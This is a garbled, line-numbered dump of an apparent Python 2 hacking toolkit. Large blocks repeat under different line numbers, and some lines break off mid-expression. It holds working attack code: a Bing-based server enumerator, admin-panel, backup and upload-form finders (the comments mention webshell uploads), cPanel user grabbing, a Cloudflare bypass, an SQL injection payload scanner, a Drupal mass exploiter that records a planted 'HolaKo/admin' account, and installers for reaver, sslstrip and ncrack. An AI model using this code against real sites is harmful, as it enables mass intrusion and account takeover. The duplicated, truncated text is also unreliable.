", site + admin 728 | except IOError : 729 | pass 730 | ############################ 731 | #find ZIP files 732 | def findZip(self) : 733 | """ 734 | find zip files from grabbed websites 735 | it may contain useful informations 736 | """ 737 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 738 | clearScr() 739 | print "[~] Finding zip file" 740 | for site in self.sites : 741 | for zip1 in zipList : 742 | try: 743 | if urllib.urlopen(site + zip1).getcode() == 200 : 744 | print " [*] Found zip file -> ", site + zip1 745 | except IOError : 746 | pass 747 | ############################ 748 | #find upload directories 749 | def findUp(self) : 750 | """ 751 | find upload forms from grabbed 752 | websites the attacker may succeed to 753 | upload malicious files like webshells 754 | """ 755 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 756 | clearScr() 757 | print "[~] Finding Upload" 758 | for site in self.sites : 759 | for up in upList : 760 | try : 761 | if (urllib.urlopen(site + up).getcode() == 200) : 762 | html = urllib.urlopen(site + up).readlines() 763 | for line in html : 764 | if re.findall('type=file', line) : 765 | print " [*] Found upload -> ", site+up 766 | except IOError : 767 | pass 768 | ############################ 769 | #find users 770 | def getUsers(self) : 771 | """ 772 | get server users using a method found by 773 | iranian hackers , the attacker may 774 | do a bruteforce attack on CPanel, ssh, ftp or 775 | even mysql if it supports remote login 776 | (you can use medusa or hydra) 777 | """ 778 | clearScr() 779 | print "[~] Grabbing Users" 780 | userslist = [] 781 | for site1 in self.sites : 782 | try: 783 | site = site1 784 | site = site.replace('http://www.', '') 785 | site = site.replace('http://', '') 786 | site = site.replace('.', '') 787 | if '-' in site: 788 | site = site.replace('-', '') 789 | site = site.replace('/', '') 790 | while len(site) > 2: 791 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 792 | if 'invalid username' not in resp.lower(): 793 | print '\t [*] Found -> ', site 794 | userslist.append(site) 795 | break 796 | else : 797 | print site 798 | 799 | site = site[:-1] 800 | except: 801 | pass 802 | 803 | clearScr() 804 | for user in userslist : 805 | print user 806 | ############################ 807 | #bypass cloudflare 808 | def cloudflareBypasser(self) : 809 | """ 810 | trys to bypass cloudflare i already wrote 811 | in my blog how it works, i learned this 812 | method from a guy in madleets 813 | """ 814 | clearScr() 815 | print "[~] Bypassing cloudflare" 816 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 817 | for site in self.sites : 818 | site.replace('http://', '') 819 | site.replace('/', '') 820 | try: 821 | ip = socket.gethostbyname(site) 822 | except socket.error: 823 | pass 824 | for sub in subdoms: 825 | doo = sub + '.' + site 826 | print ' [~] Trying -> ', doo 827 | try: 828 | ddd = socket.gethostbyname(doo) 829 | if ddd != ip: 830 | print ' [*] Cloudflare bypassed -> ', ddd 831 | break 832 | except socket.error : 833 | pass 834 | ############################ 835 | #find the server banner 836 | def getServerBanner(self) : 837 | """ 838 | simply gets the server banner 839 | the attacker may benefit from it 840 | like getting the server side software 841 | """ 842 | clearScr() 843 | try: 844 | s = 'http://' + self.serverip 845 | httpresponse = urllib.urlopen(s) 846 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 847 | except: 848 | pass 849 | ############################ 850 | #greb the sqli 851 | def grabSqli(self) : 852 | """ 853 | just grabs all websites in server with php?id= dork 854 | for scanning for error based sql injection 855 | """ 856 | page = 1 857 | lista = [] 858 | while page <= 101: 859 | try: 860 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 861 | openbing = urllib2.urlopen(bing) 862 | readbing = openbing.read() 863 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 885 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 886 | for url in s: 887 | try: 888 | for param in url.split('?')[1].split('&'): 889 | for payload in payloads: 890 | power = url.replace(param, param + payload.strip()) 891 | #print power 892 | html = urllib2.urlopen(power).readlines() 893 | for line in html: 894 | checker = re.findall(check, line) 895 | if len(checker) != 0 : 896 | print ' [*] SQLi found -> ', power 897 | except: 898 | pass 899 | ############################ 900 | ############################ 901 | #scan for ports 902 | def portScanner(self, mode, ran) : 903 | """ 904 | simple port scanner works with range of ports 905 | or with common ports (al-swisre idea) 906 | """ 907 | clearScr() 908 | print "[~] Scanning Ports" 909 | def do_it(ip, port): 910 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 911 | #sock.settimeout(5) 912 | sock = sock.connect_ex((ip,port)) 913 | if sock == 0: 914 | print " [*] Port %i is open" % port 915 | 916 | if mode == 1 : 917 | a = ran.split('-') 918 | start = int(a[0]) 919 | end = int(a[1]) 920 | for i in range(start, end): 921 | do_it(self.serverip, i) 922 | elif mode == 2 : 923 | for port in [80,21,22,2082,25,53,110,443,143] : 924 | # didn't use multithreading cos it's few ports 925 | do_it(self.serverip, port) 926 | ############################ 927 | minu =''' 928 | \t 1: Drupal Bing Exploiter 929 | \t 2: Get Drupal Websites 930 | \t 3: Drupal Mass Exploiter 931 | \t 99: Back To Main Menu 932 | ''' 933 | 934 | 935 | #Definition Of Drupal Bing Expoliter 936 | def drupal(): 937 | 938 | '''Drupal Exploit Binger All Websites Of server ''' 939 | ip = raw_input('1- IP : ') 940 | page = 1 941 | while page <= 50 : 942 | 943 | url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 944 | req = urllib2.Request(url) 945 | opreq = urllib2.urlopen(req).read() 946 | findurl = re.findall('

"+site 960 | 961 | print "user:HolaKo\npass:admin" 962 | a = open('up.txt','a') 963 | a.write(site+'\n') 964 | a.write("user:"+user+"\npass:"+pwd+"\n") 965 | else : 966 | print "[-] Expl Not Found :( " 967 | 968 | except Exception as ex : 969 | print ex 970 | sys.exit(0) 971 | 972 | 973 | #Drupal Server ExtraCtor 974 | def getdrupal(): 975 | ip = raw_input('Enter The Ip : ') 976 | page = 1 977 | sites = list() 978 | while page <= 50 : 979 | 980 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 981 | req = urllib2.Request(url) 982 | opreq = urllib2.urlopen(req).read() 983 | findurl = re.findall('

"+url 1006 | print "[-]username:HolaKo\n[-]password:admin" 1007 | save = open('drupal.txt','a') 1008 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 1009 | 1010 | else : 1011 | print i + "=> exploit not found " 1012 | except Exception as ex : 1013 | print ex 1014 | def maine(): 1015 | 1016 | print minu 1017 | choose = raw_input("choose a number :") 1018 | while True : 1019 | 1020 | if choose == "1": 1021 | drupal() 1022 | if choose == "2": 1023 | getdrupal() 1024 | if choose == "3": 1025 | drupallist() 1026 | if choose == "4": 1027 | about() 1028 | if choose == "99": 1029 | 1030 | menu() 1031 | con = raw_input('Continue [Y/n] -> ') 1032 | if con[0].upper() == 'N' : 1033 | exit() 1034 | if con[0].upper() == 'Y' : 1035 | maine() 1036 | def unique(seq): 1037 | seen = set() 1038 | return [seen.add(x) or x for x in seq if x not in seen] 1039 | def bing_all_grabber(s): 1040 | lista = [] 1041 | page = 1 1042 | while page <= 101: 1043 | try: 1044 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1045 | openbing = urllib2.urlopen(bing) 1046 | readbing = openbing.read() 1047 | findwebs = re.findall('

" + sqli) 1153 | def sqlscan(): 1154 | ip = raw_input('Enter IP : ') 1155 | grabsqli(ip) 1156 | # found this code on stackoverflow.com/questions/19278877 1157 | def unique(seq): 1158 | seen = set() 1159 | return [seen.add(x) or x for x in seq if x not in seen] 1160 | def bing_all_grabber(s): 1161 | lista = [] 1162 | page = 1 1163 | while page <= 101: 1164 | try: 1165 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1166 | openbing = urllib2.urlopen(bing) 1167 | readbing = openbing.read() 1168 | findwebs = re.findall('

= 0.3ALPHA / rprogram ~> 0.3") 364 | print("Continue: y/n") 365 | choicencrack = raw_input("y / n :") 366 | if choicencrack in yes: 367 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 368 | os.system("cd ruby-ncrack") 369 | os.system("install ruby-ncrack") 370 | elif choicencrack in no: 371 | clearScr(); passwd() 372 | elif choicencrack == "": 373 | menu() 374 | else: 375 | menu() 376 | def reaver(): 377 | print """ 378 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 379 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 380 | wide variety of access points and WPS implementations 381 | 1 to accept / 0 to decline 382 | """ 383 | creaver = raw_input("y / n :") 384 | if creaver in yes: 385 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 386 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 387 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 388 | os.system("cd reaver-wps-fork-t6x/src/ & make") 389 | elif creaver in no: 390 | clearScr(); wire() 391 | elif creaver == "": 392 | menu() 393 | else: 394 | menu() 395 | def ssls(): 396 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 397 | attacks. 398 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 399 | cssl = raw_input("y / n :") 400 | if cssl in yes: 401 | os.system("git clone https://github.com/moxie0/sslstrip.git") 402 | os.system("sudo apt-get install python-twisted-web") 403 | os.system("python sslstrip/setup.py") 404 | if cssl in no: 405 | snif() 406 | elif cssl =="": 407 | menu() 408 | else: 409 | menu() 410 | def unique(seq): 411 | seen = set() 412 | return [seen.add(x) or x for x in seq if x not in seen] 413 | def bing_all_grabber(s): 414 | 415 | lista = [] 416 | page = 1 417 | while page <= 101: 418 | try: 419 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 420 | openbing = urllib2.urlopen(bing) 421 | readbing = openbing.read() 422 | findwebs = re.findall('

') 646 | if choice == '1' : 647 | self.getSites(True) 648 | elif choice == '2' : 649 | self.getJoomla() 650 | elif choice == '3' : 651 | self.getWordpress() 652 | elif choice == '4' : 653 | self.findPanels() 654 | elif choice == '5' : 655 | self.findZip() 656 | elif choice == '6' : 657 | self.findUp() 658 | elif choice == '7' : 659 | self.getUsers() 660 | elif choice == '8' : 661 | self.grabSqli() 662 | elif choice == '9' : 663 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 664 | self.portScanner(1, ran) 665 | elif choice == '10' : 666 | self.portScanner(2, None) 667 | elif choice == '11' : 668 | self.getServerBanner() 669 | elif choice == '12' : 670 | self.cloudflareBypasser() 671 | elif choice == '99' : 672 | menu() 673 | con = raw_input(' Continue [Y/n] -> ') 674 | if con[0].upper() == 'N' : 675 | exit() 676 | else : 677 | clearScr() 678 | print menuu 679 | def getSites(self, a) : 680 | """ 681 | get all websites on same server 682 | from bing search 683 | """ 684 | lista = [] 685 | page = 1 686 | while page <= 101: 687 | try: 688 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 689 | openbing = urllib2.urlopen(bing) 690 | readbing = openbing.read() 691 | findwebs = re.findall('

", site + admin 777 | except IOError : 778 | pass 779 | ############################ 780 | #find ZIP files 781 | def findZip(self) : 782 | """ 783 | find zip files from grabbed websites 784 | it may contain useful informations 785 | """ 786 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 787 | clearScr() 788 | print "[~] Finding zip file" 789 | for site in self.sites : 790 | for zip1 in zipList : 791 | try: 792 | if urllib.urlopen(site + zip1).getcode() == 200 : 793 | print " [*] Found zip file -> ", site + zip1 794 | except IOError : 795 | pass 796 | ############################ 797 | #find upload directories 798 | def findUp(self) : 799 | """ 800 | find upload forms from grabbed 801 | websites the attacker may succeed to 802 | upload malicious files like webshells 803 | """ 804 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 805 | clearScr() 806 | print "[~] Finding Upload" 807 | for site in self.sites : 808 | for up in upList : 809 | try : 810 | if (urllib.urlopen(site + up).getcode() == 200) : 811 | html = urllib.urlopen(site + up).readlines() 812 | for line in html : 813 | if re.findall('type=file', line) : 814 | print " [*] Found upload -> ", site+up 815 | except IOError : 816 | pass 817 | ############################ 818 | #find users 819 | def getUsers(self) : 820 | """ 821 | get server users using a method found by 822 | iranian hackers , the attacker may 823 | do a bruteforce attack on CPanel, ssh, ftp or 824 | even mysql if it supports remote login 825 | (you can use medusa or hydra) 826 | """ 827 | clearScr() 828 | print "[~] Grabbing Users" 829 | userslist = [] 830 | for site1 in self.sites : 831 | try: 832 | site = site1 833 | site = site.replace('http://www.', '') 834 | site = site.replace('http://', '') 835 | site = site.replace('.', '') 836 | if '-' in site: 837 | site = site.replace('-', '') 838 | site = site.replace('/', '') 839 | while len(site) > 2: 840 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 841 | if 'invalid username' not in resp.lower(): 842 | print '\t [*] Found -> ', site 843 | userslist.append(site) 844 | break 845 | else : 846 | print site 847 | 848 | site = site[:-1] 849 | except: 850 | pass 851 | 852 | clearScr() 853 | for user in userslist : 854 | print user 855 | ############################ 856 | #bypass cloudflare 857 | def cloudflareBypasser(self) : 858 | """ 859 | trys to bypass cloudflare i already wrote 860 | in my blog how it works, i learned this 861 | method from a guy in madleets 862 | """ 863 | clearScr() 864 | print "[~] Bypassing cloudflare" 865 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 866 | for site in self.sites : 867 | site.replace('http://', '') 868 | site.replace('/', '') 869 | try: 870 | ip = socket.gethostbyname(site) 871 | except socket.error: 872 | pass 873 | for sub in subdoms: 874 | doo = sub + '.' + site 875 | print ' [~] Trying -> ', doo 876 | try: 877 | ddd = socket.gethostbyname(doo) 878 | if ddd != ip: 879 | print ' [*] Cloudflare bypassed -> ', ddd 880 | break 881 | except socket.error : 882 | pass 883 | ############################ 884 | #find the server banner 885 | def getServerBanner(self) : 886 | """ 887 | simply gets the server banner 888 | the attacker may benefit from it 889 | like getting the server side software 890 | """ 891 | clearScr() 892 | try: 893 | s = 'http://' + self.serverip 894 | httpresponse = urllib.urlopen(s) 895 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 896 | except: 897 | pass 898 | ############################ 899 | #greb the sqli 900 | def grabSqli(self) : 901 | """ 902 | just grabs all websites in server with php?id= dork 903 | for scanning for error based sql injection 904 | """ 905 | page = 1 906 | lista = [] 907 | while page <= 101: 908 | try: 909 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 910 | openbing = urllib2.urlopen(bing) 911 | readbing = openbing.read() 912 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 934 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 935 | for url in s: 936 | try: 937 | for param in url.split('?')[1].split('&'): 938 | for payload in payloads: 939 | power = url.replace(param, param + payload.strip()) 940 | #print power 941 | html = urllib2.urlopen(power).readlines() 942 | for line in html: 943 | checker = re.findall(check, line) 944 | if len(checker) != 0 : 945 | print ' [*] SQLi found -> ', power 946 | except: 947 | pass 948 | ############################ 949 | ############################ 950 | #scan for ports 951 | def portScanner(self, mode, ran) : 952 | """ 953 | simple port scanner works with range of ports 954 | or with common ports (al-swisre idea) 955 | """ 956 | clearScr() 957 | print "[~] Scanning Ports" 958 | def do_it(ip, port): 959 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 960 | #sock.settimeout(5) 961 | sock = sock.connect_ex((ip,port)) 962 | if sock == 0: 963 | print " [*] Port %i is open" % port 964 | 965 | if mode == 1 : 966 | a = ran.split('-') 967 | start = int(a[0]) 968 | end = int(a[1]) 969 | for i in range(start, end): 970 | do_it(self.serverip, i) 971 | elif mode == 2 : 972 | for port in [80,21,22,2082,25,53,110,443,143] : 973 | # didn't use multithreading cos it's few ports 974 | do_it(self.serverip, port) 975 | ############################ 976 | minu =''' 977 | \t 1: Drupal Bing Exploiter 978 | \t 2: Get Drupal Websites 979 | \t 3: Drupal Mass Exploiter 980 | \t 99: Back To Main Menu 981 | ''' 982 | 983 | 984 | #Definition Of Drupal Bing Expoliter 985 | def drupal(): 986 | 987 | '''Drupal Exploit Binger All Websites Of server ''' 988 | ip = raw_input('1- IP : ') 989 | page = 1 990 | while page <= 50 : 991 | 992 | url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 993 | req = urllib2.Request(url) 994 | opreq = urllib2.urlopen(req).read() 995 | findurl = re.findall('

"+site 1009 | 1010 | print "user:HolaKo\npass:admin" 1011 | a = open('up.txt','a') 1012 | a.write(site+'\n') 1013 | a.write("user:"+user+"\npass:"+pwd+"\n") 1014 | else : 1015 | print "[-] Expl Not Found :( " 1016 | 1017 | except Exception as ex : 1018 | print ex 1019 | sys.exit(0) 1020 | 1021 | 1022 | #Drupal Server ExtraCtor 1023 | def getdrupal(): 1024 | ip = raw_input('Enter The Ip : ') 1025 | page = 1 1026 | sites = list() 1027 | while page <= 50 : 1028 | 1029 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 1030 | req = urllib2.Request(url) 1031 | opreq = urllib2.urlopen(req).read() 1032 | findurl = re.findall('

"+url 1055 | print "[-]username:HolaKo\n[-]password:admin" 1056 | save = open('drupal.txt','a') 1057 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 1058 | 1059 | else : 1060 | print i + "=> exploit not found " 1061 | except Exception as ex : 1062 | print ex 1063 | def maine(): 1064 | 1065 | print minu 1066 | choose = raw_input("choose a number :") 1067 | while True : 1068 | 1069 | if choose == "1": 1070 | drupal() 1071 | if choose == "2": 1072 | getdrupal() 1073 | if choose == "3": 1074 | drupallist() 1075 | if choose == "4": 1076 | about() 1077 | if choose == "99": 1078 | 1079 | menu() 1080 | con = raw_input('Continue [Y/n] -> ') 1081 | if con[0].upper() == 'N' : 1082 | exit() 1083 | if con[0].upper() == 'Y' : 1084 | maine() 1085 | def unique(seq): 1086 | seen = set() 1087 | return [seen.add(x) or x for x in seq if x not in seen] 1088 | def bing_all_grabber(s): 1089 | lista = [] 1090 | page = 1 1091 | while page <= 101: 1092 | try: 1093 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1094 | openbing = urllib2.urlopen(bing) 1095 | readbing = openbing.read() 1096 | findwebs = re.findall('

" + sqli) 1202 | def sqlscan(): 1203 | ip = raw_input('Enter IP : ') 1204 | grabsqli(ip) 1205 | # found this code on stackoverflow.com/questions/19278877 1206 | def unique(seq): 1207 | seen = set() 1208 | return [seen.add(x) or x for x in seq if x not in seen] 1209 | def bing_all_grabber(s): 1210 | lista = [] 1211 | page = 1 1212 | while page <= 101: 1213 | try: 1214 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1215 | openbing = urllib2.urlopen(bing) 1216 | readbing = openbing.read() 1217 | findwebs = re.findall('